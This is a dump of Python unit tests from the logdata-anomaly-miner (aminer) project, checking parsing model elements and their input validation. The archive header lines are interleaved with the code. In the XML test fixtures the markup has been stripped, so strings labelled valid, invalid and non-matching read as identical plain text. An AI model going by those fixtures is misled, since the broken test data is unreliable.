self.id_, 123) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, []) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, ()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, set()) def test5min_repeat_input_validation(self): """Check if min_repeat is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat="string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=True) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=-1) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat={"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=[]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, min_repeat=set()) def test6max_repeat_input_validation(self): """Check if max_repeat is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat="string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=True) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=0) self.assertRaises(ValueError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=10, min_repeat=11) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=123.22) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat={"id": "path"}) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=["path"]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=[]) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=()) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, fixed_dme, max_repeat=set()) def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/SequenceModelElementTest.py000066400000000000000000000133141500476301700307020ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.SequenceModelElement import SequenceModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class SequenceModelElementTest(TestBase): """Unittests for the SequenceModelElement.""" id_ = "sequence" path = "path" children = [DummyFixedDataModelElement("0", b"string0 "), DummyFixedDataModelElement("1", b"string1 "), DummyFixedDataModelElement("2", b"string2")] match_elements = [MatchElement("path/sequence/0", b"string0 ", b"string0 ", None), MatchElement("path/sequence/1", b"string1 ", b"string1 ", None), MatchElement("path/sequence/2", b"string2", b"string2", None)] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"string0 string1 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, self.match_elements) data = b"string0 string1 string2 other string follows" value = b"string0 string1 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, self.match_elements) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string1 " match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string1 string3" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"string0 string0 string2" match_context = DummyMatchContext(data) sequence_me = SequenceModelElement(self.id_, self.children) match_element = sequence_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, SequenceModelElement, "", self.children) self.assertRaises(TypeError, SequenceModelElement, None, self.children) self.assertRaises(TypeError, SequenceModelElement, b"path", self.children) self.assertRaises(TypeError, SequenceModelElement, True, self.children) self.assertRaises(TypeError, SequenceModelElement, 123, self.children) self.assertRaises(TypeError, SequenceModelElement, 123.22, self.children) self.assertRaises(TypeError, SequenceModelElement, {"id": "path"}, self.children) self.assertRaises(TypeError, SequenceModelElement, ["path"], self.children) self.assertRaises(TypeError, SequenceModelElement, [], self.children) self.assertRaises(TypeError, SequenceModelElement, (), self.children) self.assertRaises(TypeError, SequenceModelElement, set(), self.children) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = SequenceModelElement(self.id_, self.children) data = b"string0 string1 string2" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/VariableByteDataModelElementTest.py000066400000000000000000000130141500476301700322720ustar00rootroot00000000000000import unittest from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class VariableByteDataModelElementTest(TestBase): """Unittests for the VariableByteDataModelElement.""" id_ = "variable" path = "path" alphabet = b"abcdefghijklmnopqrstuvwxyz " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklm nopqrstuvwxyz.!?" value = b"abcdefghijklm nopqrstuvwxyz" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"!abcdefghijklm nopqrstuvwxyz.!?" match_context = DummyMatchContext(data) variable_byte_dme = VariableByteDataModelElement(self.id_, self.alphabet) match_element = variable_byte_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, VariableByteDataModelElement, "", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, None, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, b"path", self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, True, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, 123.22, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, {"id": "path"}, self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, ["path"], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, [], self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, (), self.alphabet) self.assertRaises(TypeError, VariableByteDataModelElement, set(), self.alphabet) def test4alphabet_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, "string") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, None) self.assertRaises(ValueError, VariableByteDataModelElement, self.id_, b"") self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, True) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, 123.22) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ["path"]) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, []) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, ()) self.assertRaises(TypeError, VariableByteDataModelElement, self.id_, set()) def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = VariableByteDataModelElement(self.id_, self.alphabet) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/WhiteSpaceLimitedDataModelElementTest.py000066400000000000000000000153721500476301700332760ustar00rootroot00000000000000import unittest from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class WhiteSpaceLimitedDataModelElementTest(TestBase): """Unittests for the WhiteSpaceLimitedDataModelElement.""" id_ = "whitespace" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"This+is+a+string+without+any+whitespaces." match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) data = b"This is a string with whitespaces." value = b"This" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"space: ,tab:\t" value = b"space:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"tab:\t\t,space: " value = b"tab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) data = b"spacetab: \t,tab:\t" value = b"spacetab:" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\ttab" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" space" match_context = DummyMatchContext(data) whitespace_dme = WhiteSpaceLimitedDataModelElement(self.id_) match_element = whitespace_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, WhiteSpaceLimitedDataModelElement, "") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, None) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, b"path") self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, True) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, 123.22) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, {"id": "path"}) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ["path"]) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, []) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, ()) self.assertRaises(TypeError, WhiteSpaceLimitedDataModelElement, set()) def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = WhiteSpaceLimitedDataModelElement(self.id_) data = b"space: ,tab:\t" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/XmlModelElementTest.py000066400000000000000000000446101500476301700276750ustar00rootroot00000000000000import copy import unittest import defusedxml.ElementTree as xml import json from aminer.parsing.XmlModelElement import XmlModelElement, decode_xml from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyNumberModelElement class XmlModelElementTest(TestBase): """Unittests for the XmlModelElement.""" id_ = "xml" path = "path" single_line = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_missing_element = b"JaniDon't forget me this weekend!Don't forget me this weekend!" single_line_invalid = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_no_match = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_non_optional_empty = b"ToveDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" single_line_no_xml = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will notddddddddddddddd" single_line_escaped = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I\x20will\x20notI\x20will\x20not" single_line_xml_declaration = b"" \ b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" multi_line = b""" Tove Jani Don't forget me this weekend! Don't forget me this weekend! Jani Tove Re: test1 test2 """ key_parser_dict = {"messages": [{"note": { "+id": DummyNumberModelElement("id"), "_+opt": DummyFixedDataModelElement("opt", b"text"), "to": AnyByteDataModelElement("to"), "from": AnyByteDataModelElement("from"), "?heading": AnyByteDataModelElement("heading"), "body": { "text1": AnyByteDataModelElement("text1"), "text2": AnyByteDataModelElement("text2") } }}]} key_parser_dict_allow_all = {"messages": [{"note": { "+id": DummyNumberModelElement("id"), "_+opt": DummyFixedDataModelElement("opt", b"text"), "to": AnyByteDataModelElement("to"), "from": AnyByteDataModelElement("from"), "?heading": AnyByteDataModelElement("heading"), "body": "ALLOW_ALL" }}]} def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" xml_model_element = XmlModelElement(self.id_, self.key_parser_dict) data = self.single_line value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) data = self.multi_line value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) data = self.single_line_escaped value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(self.single_line_escaped) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = self.single_line self.compare_match_results( data, match_element, match_context, self.id_, self.path, self.single_line, value, match_element.children) data = self.single_line_xml_declaration value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = self.single_line match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, self.single_line, value, match_element.children) xml_model_element = XmlModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) def test2get_match_element_with_umlaut(self): """Test if ä ö ü are used correctly.""" key_parser_dict = {"messages": [{"note": {"works": DummyFixedDataModelElement("abc", "a ä ü ö z".encode("utf-8"))}}]} data = "a ä ü ö z".encode("utf-8") xml_model_element = XmlModelElement(self.id_, key_parser_dict) value = decode_xml(xml.fromstring(data)) match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) match_context.match_string = data match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, data, value, match_element.children) def test3get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" xml_model_element = XmlModelElement(self.id_, self.key_parser_dict) # missing element data = self.single_line_missing_element match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # invalid xml data = self.single_line_invalid match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # child not matching data = self.single_line_no_match match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # non-optional empty data = self.single_line_non_optional_empty match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # no xml data = self.single_line_no_xml match_context = DummyMatchContext(data) match_element = xml_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test4element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, XmlModelElement, "", self.key_parser_dict) # empty element_id self.assertRaises(TypeError, XmlModelElement, None, self.key_parser_dict) # None element_id self.assertRaises(TypeError, XmlModelElement, b"path", self.key_parser_dict) # bytes element_id is not allowed self.assertRaises(TypeError, XmlModelElement, True, self.key_parser_dict) # boolean element_id is not allowed self.assertRaises(TypeError, XmlModelElement, 123, self.key_parser_dict) # integer element_id is not allowed self.assertRaises(TypeError, XmlModelElement, 123.22, self.key_parser_dict) # float element_id is not allowed self.assertRaises(TypeError, XmlModelElement, {"id": "path"}, self.key_parser_dict) # dict element_id is not allowed self.assertRaises(TypeError, XmlModelElement, ["path"], self.key_parser_dict) # list element_id is not allowed self.assertRaises(TypeError, XmlModelElement, [], self.key_parser_dict) # empty list element_id is not allowed self.assertRaises(TypeError, XmlModelElement, (), self.key_parser_dict) # empty tuple element_id is not allowed self.assertRaises(TypeError, XmlModelElement, set(), self.key_parser_dict) # empty set element_id is not allowed def test5key_parser_dict_input_validation(self): """Check if key_parser_dict is validated.""" self.assertRaises(TypeError, XmlModelElement, self.id_, "path") # string key_parser_dict self.assertRaises(TypeError, XmlModelElement, self.id_, None) # None key_parser_dict self.assertRaises(TypeError, XmlModelElement, self.id_, b"path") # bytes key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, True) # boolean key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, 123) # integer key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, 123.22) # float key_parser_dict is not allowed # dict key_parser_dict with no ModelElementInterface values is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, {"id": "path"}) # dict key_parser_dict with list of other lengths than 1 is not allowed. key_parser_dict = copy.deepcopy(self.key_parser_dict) key_parser_dict["messages"] = [] self.assertRaises(ValueError, XmlModelElement, self.id_, key_parser_dict) self.assertRaises(TypeError, XmlModelElement, self.id_, ["path"]) # list key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, []) # empty list key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, ()) # empty tuple key_parser_dict is not allowed self.assertRaises(TypeError, XmlModelElement, self.id_, set()) # empty set key_parser_dict is not allowed def test6attribute_prefix_input_validation(self): """Check if attribute_prefix is validated.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=True) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix=set()) def test7optional_attribute_prefix_input_validation(self): """Check if optional_attribute_prefix is validated.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=True) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, optional_attribute_prefix=set()) def test8empty_allowed_prefix_input_validation(self): """Check if empty_allowed_prefix is validated.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=True) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix=set()) def test9xml_header_expected_input_validation(self): """Check if xml_header_expected is validated.""" self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected="") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=None) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=b"path") self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=123) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=123.22) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected={"id": "path"}) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=["path"]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=[]) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=()) self.assertRaises(TypeError, XmlModelElement, self.id_, self.key_parser_dict, xml_header_expected=set()) def test10compare_prefixes(self): """Check if all prefixes are validated against each other.""" self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix="$", optional_attribute_prefix="$") self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, attribute_prefix="$", empty_allowed_prefix="$") self.assertRaises(ValueError, XmlModelElement, self.id_, self.key_parser_dict, empty_allowed_prefix="$", optional_attribute_prefix="$") if __name__ == "__main__": 